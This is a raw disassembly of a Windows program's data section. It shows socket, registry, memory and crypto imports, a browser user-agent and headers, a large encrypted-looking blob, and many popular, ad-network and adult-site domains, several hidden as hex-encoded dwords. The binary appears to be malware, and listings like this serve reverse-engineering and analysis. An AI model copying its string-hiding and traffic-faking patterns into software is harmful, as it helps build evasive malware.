off_9B8900 dd offset loc_9AB858 ; DATA XREF: sub_9B5480-7B94�r
off_9B8904 dd offset loc_9AF2CC ; DATA XREF: sub_9B0930+1767�r
off_9B8908 dd offset loc_9AB264 ; DATA XREF: sub_9AC250+76F4�r
off_9B890C dd offset loc_9ACF74 ; DATA XREF: sub_9AB1A0+A9DF�r
off_9B8910 dd offset loc_9AB558 ; DATA XREF: sub_9B63D8-AE10�r
aInstaller_0 db 'Installer',0 ; DATA XREF: .text:009BA24C�o
align 10h
dword_9B8920 dd 0FFFFFFFFh, 9B05F4h, 9B4780h, 6E7A6573h, 632E6D61h
; DATA XREF: .text:off_9BAC5B�o
; .text:009B9C48�o
dd 7Ah, 79616265h, 6D6F632Eh
db 0
off_9B8941 dd offset loc_9AC0B0 ; DATA XREF: sub_9B4950+A5�r
off_9B8945 dd offset sub_9AF960 ; DATA XREF: sub_9AF5E4-1C95�r
off_9B8949 dd offset aVerqueryvaluea ; DATA XREF: sub_9B0930:loc_9B41BC�r
; "VerQueryValueA"
align 10h
aSetup db 'Setup',0 ; DATA XREF: .text:009BA2FC�o
off_9B8956 dd offset loc_9B59B4 ; DATA XREF: sub_9B2010-38FD�r
align 4
aGetmodulefilen db 'GetModuleFileNameA',0 ; DATA XREF: .text:off_9BAB7C�o
off_9B896F dd offset loc_9AFD94 ; DATA XREF: sub_9ADAC4-65F�r
align 4
dword_9B8974 dd 5355h, 6F6E646Fh, 73616C6Bh, 6B696E73h, 75722E69h, 0
; DATA XREF: .text:009BA324�o
; .text:009B9C08�o
dword_9B898C dd 0FFFFFFFFh, 9AF320h, 9B12B8h ; DATA XREF: .text:off_9BB08B�o
off_9B8998 dd offset loc_9AB0D8 ; DATA XREF: sub_9B0930+3967�r
aPages db 'Pages',0 ; DATA XREF: .text:009BA2B0�o
off_9B89A2 dd offset loc_9AC3F4 ; DATA XREF: sub_9B03E8-4A4�r
align 4
dword_9B89A8 dd 7073796Dh, 2E656361h, 6D6F63h ; DATA XREF: .text:009B9BE4�o
off_9B89B4 dd offset aIoctlsocket ; DATA XREF: sub_9B0930:loc_9B51EC�r
; "ioctlsocket"
aNtohs db 'ntohs',0 ; DATA XREF: .text:off_9B9910�o
off_9B89BE dd offset loc_9B136C ; DATA XREF: sub_9AF030+516D�r
off_9B89C2 dd offset loc_9AFB58 ; DATA XREF: sub_9B1F68-12A9�r
off_9B89C6 dd offset loc_9B1C48 ; DATA XREF: sub_9B0FD0+56�r
off_9B89CA dd offset loc_9ACC48 ; DATA XREF: sub_9B36E8-5748�r
align 10h
byte_9B89D0 db 4Eh, 54h, 0 ; DATA XREF: .text:009BAD30�o
off_9B89D3 dd offset loc_9B3B78 ; DATA XREF: sub_9AF25C+6DD4�r
align 4
aLive db 'Live',0 ; DATA XREF: .text:009BA26C�o
off_9B89DD dd offset loc_9B2D8C ; DATA XREF: sub_9B0930-4090�r
off_9B89E1 dd offset loc_9AB974 ; DATA XREF: sub_9B0930-14B6�r
align 4
dword_9B89E8 dd 632E6F67h ; DATA XREF: .text:009B9B60�o
db 6Fh, 6Dh, 0
off_9B89EF dd offset aMozilla4_0Comp ; DATA XREF: sub_9AB3B0+2�r
; "Mozilla/4.0 (compatible; MSIE "
align 4
dword_9B89F4 dd 432D4155h, 203A5550h, 0D363878h ; DATA XREF: .text:009BB044�o
db 0Ah, 0
off_9B8A02 dd offset sub_9B161C ; DATA XREF: sub_9B5300+13�r
off_9B8A06 dd offset loc_9B0ED0 ; DATA XREF: sub_9B649C+3F�r
off_9B8A0A dd offset loc_9AE054 ; DATA XREF: sub_9B1F68-4A1�r
off_9B8A0E dd offset loc_9AEB4C ; DATA XREF: sub_9ADCEC-27F8�r
align 4
dword_9B8A14 dd 0C355h ; DATA XREF: sub_9B3150-3098�r
dd 0
dword_9B8A1C dd 283CC491h, 0C9CFB1E0h, 0F54ABF9Ah, 9E15D92h, 48C4FD1h
; DATA XREF: .text:Src�o
dd 0EB3CD7C5h, 0AD7CD778h, 323F206Dh, 0C649E399h, 8ED6CB7Bh
dd 68F70506h, 0B782EFFBh, 47AF4FE9h, 0A63E061Dh, 0A6F6A6CCh
dd 2F267FAh, 7683F8E5h, 61C5C293h, 0D33035Ch, 0E946EB8Ch
dd 0EE9B3CDDh, 67BF658Dh, 0ACE6F792h, 7BEA69ACh, 17CA0F13h
dd 0B96F11A8h, 0C4C1AF27h, 320EFF67h, 6CC296CBh, 345C1E75h
dd 7B182C3Ch, 0E60A693h, 7053B5EAh, 73E869E6h, 98971E6h
dd 40789805h, 5B74D3E9h, 0A69E3FCFh, 0E1DF13C1h, 740A88FBh
dd 203EBA4Eh, 134BEDC7h, 0ED1BD125h, 6D54842Eh, 4B8D7E57h
dd 20EA096Ah, 895B833Bh, 0BEEAED2Bh, 0E9AA0609h, 1CBBFB42h
dd 0D7D3245Dh, 7E4D28F4h, 6E74FF9Bh, 4C915DBBh, 49357651h
dd 0CC7D7D89h, 11D733A9h, 0BA5A276Ch, 60FC46CBh, 0F5B9F8E0h
dd 0FD0C8B9Eh, 624C3A23h, 0D63910CEh, 9413CCCFh, 1C81EBC5h
dd 637BC600h, 0F524035Ch, 296D5E72h, 64D3B981h, 2069079Ah
dd 0D3C0580Ah, 11DE7617h, 0ACBAC797h, 39AF3EFCh, 0C10F7763h
dd 2C953545h, 0C8255219h, 80EDBBB5h, 4E78BA07h, 7A96B49h
dd 895EE017h, 0B4DFAE8Ah, 56476017h, 2DA2FA13h, 242798Eh
dd 2940BC51h, 0E52FAE2h, 4B305415h, 6ED69930h, 0ED0777Eh
dd 2BE4B763h, 0C9268259h, 30F0BDF5h, 0FE057A5Dh, 20FAEFABh
dd 22903496h, 86C5EBD0h, 60D91686h, 8A746397h, 65EDDEA3h
dd 0C57327BAh, 0D748995Eh, 5B095CD6h, 0BAA4A792h, 0E3418193h
dd 77518F40h, 308C827Fh, 1E994D6h, 74F191F6h, 4C5ED1DCh
dd 4FC9308Eh, 0B0B5B5CBh, 612870E6h, 0AFA6F897h, 267C86CBh
dd 0CACCD8F6h, 2175402h, 0B3A181CAh, 0D103A142h, 94415A10h
dd 0A9C924EAh, 0E8C5CA09h, 40A14119h, 0A39D898h, 0FCB93EC1h
dd 0B5456CD2h, 0C1AEC66Bh, 7A731F5Eh
off_9B8C1C dd offset loc_9B1064 ; DATA XREF: sub_9B2E04-626B�r
off_9B8C20 dd offset aEntercriticals ; DATA XREF: sub_9B0930:loc_9B4BD0�r
; "EnterCriticalSection"
dword_9B8C24 dd 6F686179h, 6F632E6Fh ; DATA XREF: .text:009B9CC4�o
db 6Dh, 0
off_9B8C2E dd offset loc_9B5A4C ; DATA XREF: sub_9AC170+B�r
align 4
aGetsockname db 'getsockname',0 ; DATA XREF: .text:off_9BAB84�o
aFastclick_com db 'fastclick.com',0 ; DATA XREF: .text:009B9B40�o
align 10h
aSourceforge_ne db 'sourceforge.net',0 ; DATA XREF: .text:009B9C58�o
off_9B8C60 dd offset loc_9B3E90 ; DATA XREF: sub_9B0930-27B2�r
off_9B8C64 dd offset loc_9B0E4C ; DATA XREF: sub_9B4FD0+512�r
off_9B8C68 dd offset loc_9B18BC ; DATA XREF: sub_9AD3EC+20D1�r
dword_9B8C6C dd 6C64746Eh, 6C642E6Ch, 6Ch ; DATA XREF: .text:off_9BA9E4�o
dword_9B8C78 dd 6E72656Bh, 32336C65h, 6C6C642Eh ; DATA XREF: .text:off_9BAE26�o
db 0
off_9B8C85 dd offset loc_9B4A50 ; DATA XREF: sub_9AB1A0+2171�r
align 4
dword_9B8C8C dd 0FFFFFFFFh, 9B5220h, 9AFD40h, 636D6F63h, 2E747361h
; DATA XREF: .text:off_9BAAD8�o
; .text:009B9B00�o
dd 74656Eh
aAdvapi32 db 'ADVAPI32',0 ; DATA XREF: .text:off_9B969B�o
off_9B8CAD dd offset dword_9BA3E4 ; DATA XREF: sub_9AD97C+5�r
off_9B8CB1 dd offset dword_9B8EF0 ; DATA XREF: sub_9B5FC0+5�r
off_9B8CB5 dd offset loc_9AB414 ; DATA XREF: sub_9ADAC4+57B1�r
off_9B8CB9 dd offset loc_9B1FE0 ; DATA XREF: sub_9B6504+3E�r
off_9B8CBD dd offset unknown_libname_1 ; DATA XREF: sub_9AB1A0+B�r
; sub_9AB7C0+B�r ...
; Microsoft VisualC 2-8/net runtime
off_9B8CC1 dd offset loc_9B532C ; DATA XREF: sub_9B36E8+5E�r
align 4
dword_9B8CC8 dd 696B6977h, 6964656Dh, 726F2E61h ; DATA XREF: .text:009B9CA4�o
db 67h, 0
off_9B8CD6 dd offset loc_9B2BF0 ; DATA XREF: sub_9ABF08+768F�r
off_9B8CDA dd offset dword_9B8E90 ; DATA XREF: sub_9B0C20+5�r
align 10h
a4322 db '4322',0 ; DATA XREF: .text:009BA80C�o
align 4
aGetfileattribu db 'GetFileAttributesA',0 ; DATA XREF: .text:off_9B9FD0�o
off_9B8CFB dd offset dword_9BABC4 ; DATA XREF: sub_9B1F68+5�r
align 10h
off_9B8D00 dd offset dword_9B91D8 ; DATA XREF: sub_9B63D8-14C9�r
dd offset dword_9B91D8
dd offset dword_9B91D8
dd offset dword_9B9064
off_9B8D10 dd offset loc_9B4860 ; DATA XREF: sub_9B63D8-8D95�r
off_9B8D14 dd offset loc_9AFFE4 ; DATA XREF: sub_9ABD30+26�r
dword_9B8D18 dd 696E696Dh, 70696C63h, 6D6F632Eh, 0 ; DATA XREF: .text:009B9BD0�o
byte_9B8D28 db 30h, 2Eh, 0 ; DATA XREF: .text:off_9BA42C�o
off_9B8D2B dd offset loc_9B525C ; DATA XREF: sub_9B1A08-30A4�r
align 10h
dword_9B8D30 dd 632E6F63h, 63h, 65646956h ; DATA XREF: .text:009B9AFC�o
; .text:009BA328�o
db 6Fh, 0
off_9B8D3E dd offset loc_9B4840 ; DATA XREF: sub_9B1F68-1D7A�r
off_9B8D42 dd offset loc_9AD668 ; DATA XREF: sub_9B2C70+F�r
align 4
dword_9B8D48 dd 696E696Dh, 61766F6Eh, 67726F2Eh, 0 ; DATA XREF: .text:009B9BD4�o
dword_9B8D58 dd 65636166h, 6B6F6F62h, 6D6F632Eh ; DATA XREF: .text:009B9B3C�o
db 0
off_9B8D65 dd offset loc_9AD6E8 ; DATA XREF: sub_9B63D8-93ED�r
off_9B8D69 dd offset loc_9AD694 ; DATA XREF: sub_9B27D8+1C13�r
off_9B8D6D dd offset loc_9ADC24 ; DATA XREF: sub_9ACA48+A9�r
align 4
aAdultadworld_c db 'adultadworld.com',0 ; DATA XREF: .text:009B9AA8�o
off_9B8D85 dd offset aLoadlibrarya_0 ; DATA XREF: sub_9B0930:loc_9AE390�r
; "LoadLibraryA"
off_9B8D89 dd offset loc_9B5D70 ; DATA XREF: sub_9B04A8+A20�r
align 10h
a50727 db '50727',0 ; DATA XREF: .text:009BA824�o
off_9B8D96 dd offset loc_9B4918 ; DATA XREF: sub_9ABE84+65�r
align 4
aResources db 'Resources',0 ; DATA XREF: .text:009BA2EC�o
off_9B8DA6 dd offset loc_9AB698 ; DATA XREF: sub_9B1A08+3258�r
align 4
aFiles db 'Files',0 ; DATA XREF: .text:009BA228�o
off_9B8DB2 dd offset loc_9B4898 ; DATA XREF: sub_9B0930-8FB�r
off_9B8DB6 dd offset dword_9B98C8 ; DATA XREF: sub_9B63D8:loc_9AE818�r
off_9B8DBA dd offset loc_9AC908 ; DATA XREF: sub_9B46CC-57ED�r
off_9B8DBE dd offset dword_9BBD30 ; DATA XREF: sub_9B174C-60EC�r
; sub_9AEC20-3507�r ...
off_9B8DC2 dd offset loc_9B1F1C ; DATA XREF: sub_9AEDD0-33D9�r
align 4
dword_9B8DC8 dd 0FFFFFFFFh, 9B25B4h, 9AC998h ; DATA XREF: .text:off_9BA8AD�o
off_9B8DD4 dd offset loc_9B603C ; DATA XREF: sub_9AF25C+5467�r
off_9B8DD8 dd offset dword_9B9CE0 ; DATA XREF: sub_9B31A8+5�r
byte_9B8DDC db 32h, 2Eh, 0 ; DATA XREF: .text:009B90C0�o
off_9B8DDF dd offset loc_9ADA40 ; DATA XREF: sub_9B2F1C-3996�r
off_9B8DE3 dd offset loc_9AB28C ; DATA XREF: sub_9B0734+3B15�r
off_9B8DE7 dd offset loc_9B4388 ; DATA XREF: sub_9B5904-4655�r
off_9B8DEB dd offset loc_9B084C ; DATA XREF: sub_9B31A8-1EA1�r
off_9B8DEF dd offset loc_9ABE30 ; DATA XREF: sub_9ADAC4+565C�r
off_9B8DF3 dd offset loc_9B014C ; DATA XREF: sub_9B35A0-2B84�r
align 4
aCommon db 'Common',0 ; DATA XREF: .text:009BA1F8�o
align 10h
a4shared_com db '4shared.com',0 ; DATA XREF: .text:009B9A98�o
off_9B8E0C dd offset dword_9BA13C ; DATA XREF: sub_9B3B1C+5�r
aMaker db 'Maker',0 ; DATA XREF: .text:009BA278�o
off_9B8E16 dd offset loc_9ACB48 ; DATA XREF: sub_9B4FD0-317D�r
align 4
a2914 db '2914',0 ; DATA XREF: .text:off_9BA804�o
align 4
aTime db 'time',0 ; DATA XREF: .text:off_9BAFBF�o
off_9B8E29 dd offset loc_9B2DB8 ; DATA XREF: sub_9B0930+1E88�r
align 10h
aService_0 db 'Service',0 ; DATA XREF: .text:009BA2F8�o
off_9B8E38 dd offset loc_9AE8E4 ; DATA XREF: sub_9B0930+11EA�r
aGetpeername db 'getpeername',0 ; DATA XREF: .text:off_9B9827�o
aAssembly db 'assembly',0 ; DATA XREF: .text:009BA1E4�o
; char *off_9B8E51
off_9B8E51 dd offset aD_tmp ; DATA XREF: sub_9B3BE8-8C65�r
; "\\%d.tmp"
off_9B8E55 dd offset aVarfileinfoTra ; DATA XREF: sub_9B562C-64D0�r
; "\\VarFileInfo\\Translation"
align 4
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: .text:off_9BA107�o
off_9B8E65 dd offset aGetsystemtime ; DATA XREF: sub_9B0930:loc_9B37B4�r
; "GetSystemTime"
align 4
dword_9B8E6C dd 2D65642Ch, 713B4544h, 352E303Dh ; DATA XREF: .text:off_9BA48C�o
db 0
off_9B8E79 dd offset loc_9B3CB0 ; DATA XREF: sub_9B14CC+44�r
off_9B8E7D dd offset aMemmove ; DATA XREF: sub_9B0930:loc_9B2368�r
; "memmove"
off_9B8E81 dd offset aGethostbyname ; DATA XREF: sub_9B0930:loc_9B0EE4�r
; "gethostbyname"
align 4
a4325 db '4325',0 ; DATA XREF: .text:009BA810�o
align 10h
dword_9B8E90 dd 0FFFFFFFFh, 9B0300h, 9B56E8h ; DATA XREF: .text:off_9B8CDA�o
off_9B8E9C dd offset loc_9B55C4 ; DATA XREF: sub_9B63D8-3713�r
off_9B8EA0 dd offset aGlobalalloc ; DATA XREF: sub_9B0930:loc_9AE8E4�r
; sub_9B0930:loc_9B3E00�r
; "GlobalAlloc"
off_9B8EA4 dd offset aFindclose ; DATA XREF: sub_9B0930:loc_9ABCB8�r
; "FindClose"
dword_9B8EA8 dd 72796B73h, 2E6B636Fh, 6D6F63h ; DATA XREF: .text:009B9C4C�o
off_9B8EB4 dd offset dword_9BA830 ; DATA XREF: sub_9B2160+5�r
aSetfilepointer db 'SetFilePointer',0 ; DATA XREF: .text:off_9B933E�o
align 4
aAdobe db 'Adobe',0 ; DATA XREF: .text:009BA1D4�o
off_9B8ECE dd offset loc_9B281C ; DATA XREF: sub_9AF030+6150�r
off_9B8ED2 dd offset dword_9BBE40 ; DATA XREF: sub_9AB11C+A�r
; sub_9AB11C+31�r ...
off_9B8ED6 dd offset dword_9B9304 ; DATA XREF: sub_9AF654+5�r
off_9B8EDA dd offset loc_9AE5A0 ; DATA XREF: sub_9B0930+4CF4�r
off_9B8EDE dd offset loc_9B3128 ; DATA XREF: sub_9B4950-757B�r
align 4
aDefinitions db 'Definitions',0 ; DATA XREF: .text:009BA20C�o
dword_9B8EF0 dd 0FFFFFFFFh, 9AC5F0h, 9AEB24h ; DATA XREF: .text:off_9B8CB1�o
off_9B8EFC dd offset loc_9B47B0 ; DATA XREF: sub_9B4950-3C8�r
dword_9B8F00 dd 6C676962h, 2E65626Fh, 6A2E656Eh, 70h ; DATA XREF: .text:009B9AEC�o
aGettemppatha db 'GetTempPathA',0 ; DATA XREF: .text:off_9B933A�o
align 10h
aDownload_com db 'download.com',0 ; DATA XREF: .text:009B9B24�o
off_9B8F2D dd offset dword_9B91E0 ; DATA XREF: sub_9ADAC4+5�r
align 4
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: .text:off_9B9FAA�o
align 10h
aYouporn_com db 'youporn.com',0 ; DATA XREF: .text:009B9CCC�o
off_9B8F5C dd offset loc_9B1E80 ; DATA XREF: sub_9B04A8-2A91�r
aAdultfriendfin db 'adultfriendfinder.com',0 ; DATA XREF: .text:009B9AAC�o
align 4
aNicovideo_jp db 'nicovideo.jp',0 ; DATA XREF: .text:009B9C00�o
off_9B8F85 dd offset loc_9AEF08 ; DATA XREF: sub_9B4950-1EA5�r
off_9B8F89 dd offset aInternettimeto ; DATA XREF: sub_9B0930:loc_9AB230�r
; "InternetTimeToSystemTime"
off_9B8F8D dd offset loc_9B48CC ; DATA XREF: sub_9B1A08-845�r
align 4
aTasks db 'Tasks',0 ; DATA XREF: .text:009BA310�o
off_9B8F9A dd offset loc_9B50D0 ; DATA XREF: sub_9B4950-49F2�r
align 10h
dword_9B8FA0 dd 626D6172h, 2E72656Ch, 7572h ; DATA XREF: .text:009B9C30�o
aMsvcrt db 'MSVCRT',0 ; DATA XREF: .text:off_9B998A�o
off_9B8FB3 dd offset loc_9B5A9C ; DATA XREF: sub_9ABC20+25�r
align 4
dword_9B8FB8 dd 0FFFFFFFFh, 9ADDA0h, 9AE18Ch ; DATA XREF: .text:off_9B9779�o
off_9B8FC4 dd offset loc_9AF58C ; DATA XREF: sub_9AF960+1A05�r
off_9B8FC8 dd offset loc_9B5A6C ; DATA XREF: sub_9AEE5C+1965�r
off_9B8FCC dd offset dword_9BA6B4 ; DATA XREF: sub_9AD01C+5�r
off_9B8FD0 dd offset dword_9B959C ; DATA XREF: sub_9AB1A0+5�r
dword_9B8FD4 dd 6E786F66h, 2E737765h, 6D6F63h ; DATA XREF: .text:009B9B54�o
aSend db 'send',0 ; DATA XREF: .text:off_9B9747�o
off_9B8FE5 dd offset loc_9B0498 ; DATA XREF: sub_9AEAAC+2CE�r
align 4
dword_9B8FEC dd 3520544Eh, 312Eh ; DATA XREF: .text:009BAD3C�o
aGetfileversion db 'GetFileVersionInfoSizeA',0 ; DATA XREF: .text:off_9B884C�o
off_9B900C dd offset sub_9AC170 ; DATA XREF: sub_9B6078+41�r
off_9B9010 dd offset loc_9B01C4 ; DATA XREF: sub_9B2C70-5B81�r
off_9B9014 dd offset loc_9B2890 ; DATA XREF: sub_9B4480-87D0�r
off_9B9018 dd offset loc_9B00DC ; DATA XREF: sub_9B5FC0+4F�r
off_9B901C dd offset loc_9B22D0 ; DATA XREF: sub_9B29B0+72�r
off_9B9020 dd offset dword_9B958C ; DATA XREF: sub_9AF704+5�r
off_9B9024 dd offset dword_9BAA14 ; DATA XREF: sub_9B0FD0+5�r
aApplicationXMs db ', application/x-ms-xbap',0 ; DATA XREF: .text:009BA360�o
off_9B9040 dd offset loc_9AE71C ; DATA XREF: sub_9ADDA4+35FD�r
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: .text:off_9B965A�o
off_9B9052 dd offset sub_9B5228 ; DATA XREF: sub_9AEBB8+61�r
align 4
off_9B9058 dd offset dword_9BA8F8 ; DATA XREF: sub_9B63D8-1472�r
dd offset dword_9BA8F8
dd offset aApplicationVnd ; ", application/vnd.ms-xpsdocument"
dword_9B9064 dd 472D6E65h, 42h, 30363034h ; DATA XREF: .text:009B8D0C�o
; .text:009BA820�o
db 37h, 0
off_9B9072 dd offset a__wsafdisset ; DATA XREF: sub_9B0930:loc_9B5594�r
; "__WSAFDIsSet"
off_9B9076 dd offset dword_9BBD2C ; DATA XREF: sub_9AF25C-33F6�r
; sub_9AF25C-2D69�r ...
off_9B907A dd offset aReadfile ; DATA XREF: sub_9B0930:loc_9B0544�r
; "ReadFile"
off_9B907E dd offset loc_9AC1FC ; DATA XREF: sub_9AE860+2A�r
off_9B9082 dd offset loc_9ACA04 ; DATA XREF: sub_9B63D8-DF0�r
align 4
dword_9B9088 dd 72726574h, 6F632E61h, 72622E6Dh ; DATA XREF: .text:009B9C68�o
db 0
off_9B9095 dd offset dword_9BA6A8 ; DATA XREF: sub_9B3D1C+5�r
off_9B9099 dd offset sub_9B3984 ; DATA XREF: sub_9ADAC4+5873�r
off_9B909D dd offset sub_9ACEE8 ; DATA XREF: sub_9B4950+36�r
off_9B90A1 dd offset aClosesocket ; DATA XREF: sub_9B0930:loc_9B3A18�r
; "closesocket"
align 4
aSchemas db 'schemas',0 ; DATA XREF: .text:009BA2F0�o
aZshare_net db 'zshare.net',0 ; DATA XREF: .text:009B9CDC�o
align 4
off_9B90BC dd offset a1_ ; DATA XREF: sub_9AF5E4-1E8C�r
; "1."
dd offset byte_9B8DDC
dd offset dword_9BA640
dword_9B90C8 dd 70676962h, 746E696Fh, 6D6F632Eh ; DATA XREF: .text:009B9AF0�o
db 0
off_9B90D5 dd offset loc_9B1EDC ; DATA XREF: sub_9B1D80-2BA6�r
off_9B90D9 dd offset dword_9B99C4 ; DATA XREF: sub_9B1A08+5�r
off_9B90DD dd offset dword_9BA3B4 ; DATA XREF: sub_9B4610+5�r
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: .text:off_9B98E6�o
align 10h
aYahoo_co_jp db 'yahoo.co.jp',0 ; DATA XREF: .text:009B9CC0�o
aClosesocket db 'closesocket',0 ; DATA XREF: .text:off_9B90A1�o
aMail db 'Mail',0 ; DATA XREF: .text:009BA274�o
align 10h
aCreateeventa db 'CreateEventA',0 ; DATA XREF: sub_9B0930:loc_9B4898�o
off_9B911D dd offset loc_9B35CC ; DATA XREF: sub_9B4610-610E�r
off_9B9121 dd offset dword_9BAF30 ; DATA XREF: sub_9AFF64+5�r
align 4
dword_9B9128 dd 6C6C6564h, 6D6F632Eh, 0 ; DATA XREF: .text:009B9B10�o
aHelp_0 db 'Help',0 ; DATA XREF: .text:009BA240�o
off_9B9139 dd offset loc_9AF76C ; DATA XREF: sub_9B3864-724C�r
align 10h
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: .text:off_9BA3D4�o
off_9B9151 dd offset loc_9AC7A8 ; DATA XREF: sub_9B04A8+3EBB�r
align 4
dword_9B9158 dd 6464697Ah, 6F632E75h, 6Dh ; DATA XREF: .text:009B9CD8�o
aVarfileinfoTra db '\VarFileInfo\Translation',0 ; DATA XREF: .text:off_9B8E55�o
align 10h
aLivejournal_co db 'livejournal.com',0 ; DATA XREF: .text:009B9BAC�o
aCreatethread db 'CreateThread',0 ; DATA XREF: sub_9B0930:loc_9B505C�o
align 10h
aWritefile db 'WriteFile',0 ; DATA XREF: .text:off_9B87D8�o
off_9B91AA dd offset loc_9AD898 ; DATA XREF: sub_9B1A08-426C�r
off_9B91AE dd offset dword_9B97A4 ; DATA XREF: sub_9AFB1C+5�r
off_9B91B2 dd offset loc_9B3600 ; DATA XREF: sub_9AF030+60�r
align 4
dword_9B91B8 dd 3620544Eh, 302Eh, 6978696Dh, 706A2Eh ; DATA XREF: .text:009BAD40�o
; .text:009B9BD8�o
off_9B91C8 dd offset loc_9B1104 ; DATA XREF: sub_9B57B4-8FB9�r
off_9B91CC dd offset loc_9B4D80 ; DATA XREF: sub_9AC6DC-2EF�r
off_9B91D0 dd offset loc_9B4078 ; DATA XREF: sub_9B43F4-629�r
off_9B91D4 dd offset aGetfileversi_0 ; DATA XREF: sub_9B0930:loc_9B08FC�r
; "GetFileVersionInfoA"
dword_9B91D8 dd 552D6E65h, 53h ; DATA XREF: .text:off_9B8D00�o
; .text:009B8D04�o ...
dword_9B91E0 dd 0FFFFFFFFh, 9B2980h, 9AD4E8h ; DATA XREF: .text:off_9B8F2D�o
off_9B91EC dd offset dword_9BBD34 ; DATA XREF: sub_9B14CC+2D�r
aConnect db 'connect',0 ; DATA XREF: .text:off_9B9717�o
aRediff_com db 'rediff.com',0 ; DATA XREF: .text:009B9C38�o
off_9B9203 dd offset aGettickcount ; DATA XREF: sub_9B0930:loc_9B0630�r
; "GetTickCount"
off_9B9207 dd offset aMicrosoftBaseC ; DATA XREF: sub_9B57B4:loc_9AC7E4�r
; "Microsoft Base Cryptographic Provider v"...
off_9B920B dd offset loc_9B4B5C ; DATA XREF: sub_9B19D8-3A66�r
off_9B920F dd offset dword_9BA9A8 ; DATA XREF: sub_9ACF9C+5�r
align 4
dword_9B9214 dd 74756F79h, 2E656275h, 6D6F63h ; DATA XREF: .text:009B9CD0�o
off_9B9220 dd offset aGlobalfree ; DATA XREF: sub_9B0930:loc_9AE508�r
; "GlobalFree"
off_9B9224 dd offset aAccept ; DATA XREF: sub_9B0930:loc_9ADC44�r
; "accept"
aIntel db 'Intel',0 ; DATA XREF: .text:009BA250�o
off_9B922E dd offset dword_9BADB8 ; DATA XREF: sub_9ADDA4+5�r
align 4
dword_9B9234 dd 0FFFFFFFFh, 9B2E8Ch, 9AE8B0h ; DATA XREF: .text:off_9BA113�o
off_9B9240 dd offset loc_9AE804 ; DATA XREF: sub_9B1A08-325�r
aWs2_32 db 'WS2_32',0 ; DATA XREF: .text:off_9B9A8F�o
align 4
aMywebsearch_co db 'mywebsearch.com',0 ; DATA XREF: .text:009B9BE8�o
off_9B925C dd offset loc_9AE2D8 ; DATA XREF: sub_9B1D80+FFC�r
off_9B9260 dd offset loc_9B52A8 ; DATA XREF: sub_9B3864-4054�r
off_9B9264 dd offset loc_9AD774 ; DATA XREF: sub_9AC250+5137�r
off_9B9268 dd offset loc_9AB068 ; DATA XREF: sub_9B4950-8E06�r
off_9B926C dd offset loc_9B355C ; DATA XREF: sub_9ABF08+47�r
off_9B9270 dd offset byte_9BAB6C ; DATA XREF: sub_9ACEE8+264B�r
aReports db 'Reports',0 ; DATA XREF: .text:009BA2E8�o
off_9B927C dd offset loc_9B3078 ; DATA XREF: sub_9B0930+260�r
off_9B9280 dd offset loc_9B169C ; DATA XREF: sub_9B1A08+1D79�r
dword_9B9284 dd 65627574h, 6F632E38h, 6Dh, 6D616878h, 72657473h, 6D6F632Eh
; DATA XREF: .text:009B9C80�o
; .text:009B9CB0�o
dd 0
dword_9B92A0 dd 6576616Eh, 6F632E72h ; DATA XREF: .text:009B9BF0�o
db 6Dh, 0
off_9B92AA dd offset loc_9ADCC8 ; DATA XREF: sub_9AB1A0+A73E�r
align 10h
dword_9B92B0 dd 0FFFFFFFFh, 9AE184h, 9AF000h ; DATA XREF: .text:off_9B99AB�o
off_9B92BC dd offset loc_9B3804 ; DATA XREF: sub_9B2830+1AF8�r
aTribalfusion_c db 'tribalfusion.com',0 ; DATA XREF: .text:009B9C7C�o
off_9B92D1 dd offset loc_9B5E5C ; DATA XREF: sub_9ADAC4+8872�r
off_9B92D5 dd offset loc_9B000C ; DATA XREF: sub_9B0930+1730�r
off_9B92D9 dd offset loc_9B2AB4 ; DATA XREF: .text:009B20AB�r
align 10h
aOffline db 'Offline',0 ; DATA XREF: .text:009BA2A4�o
aOptions db 'Options',0 ; DATA XREF: .text:009BA2A8�o
off_9B92F0 dd offset aVirtualalloc ; DATA XREF: sub_9B0930:loc_9B188C�r
; "VirtualAlloc"
off_9B92F4 dd offset loc_9ACD44 ; DATA XREF: sub_9AEC20-34F4�r
off_9B92F8 dd offset dword_9BAAB0 ; DATA XREF: sub_9AEC20+5�r
off_9B92FC dd offset aWsasocketa ; DATA XREF: sub_9B0930:loc_9AC588�r
; "WSASocketA"
off_9B9300 dd offset loc_9AF990 ; DATA XREF: sub_9B1A08-28E3�r
dword_9B9304 dd 0FFFFFFFFh, 9AF850h, 9B06E8h, 6F72616Eh, 75722E64h
; DATA XREF: .text:off_9B8ED6�o
; .text:009B9BEC�o
dd 0
aGetversionexa db 'GetVersionExA',0 ; DATA XREF: .text:off_9BADEC�o
align 4
aFindclose db 'FindClose',0 ; DATA XREF: .text:off_9B8EA4�o
off_9B9336 dd offset loc_9B13E4 ; DATA XREF: sub_9B3864-1191�r
off_9B933A dd offset aGettemppatha ; DATA XREF: sub_9B0930:loc_9B0A64�r
; "GetTempPathA"
off_9B933E dd offset aSetfilepointer ; DATA XREF: sub_9B0930:loc_9B0E28�r
; "SetFilePointer"
off_9B9342 dd offset loc_9B4ACC ; DATA XREF: sub_9B3864-5595�r
off_9B9346 dd offset aRecv ; DATA XREF: sub_9B0930:loc_9B1C5C�r
; "recv"
align 4
dword_9B934C dd 65767968h, 6C6E2E73h ; DATA XREF: .text:009B9B78�o
db 0
off_9B9355 dd offset loc_9B504C ; DATA XREF: sub_9B037C-49BD�r
align 4
aSleep_0 db 'Sleep',0 ; DATA XREF: .text:off_9BA344�o
align 4
dword_9B9364 dd 0FFFFFFFFh, 9B3DD4h, 9AC730h ; DATA XREF: .text:off_9BB021�o
byte_9B9370 db 39h, 38h, 0 ; DATA XREF: .text:off_9BAD2C�o
off_9B9373 dd offset loc_9AE7D4 ; DATA XREF: sub_9AFB1C+35�r
align 4
dword_9B9378 dd 6F616978h, 2E69656Eh, 6D6F63h ; DATA XREF: .text:009B9CB4�o
off_9B9384 dd offset loc_9B25BC ; DATA XREF: sub_9B5904-E4E�r
off_9B9388 dd offset loc_9B457C ; DATA XREF: sub_9B4950-21C6�r
off_9B938C dd offset loc_9ACD50 ; DATA XREF: sub_9AB1A0+38B5�r
aProfiles db 'Profiles',0 ; DATA XREF: .text:009BA2D0�o
off_9B9399 dd offset loc_9AB080 ; DATA XREF: sub_9B1D80-3A98�r
align 10h
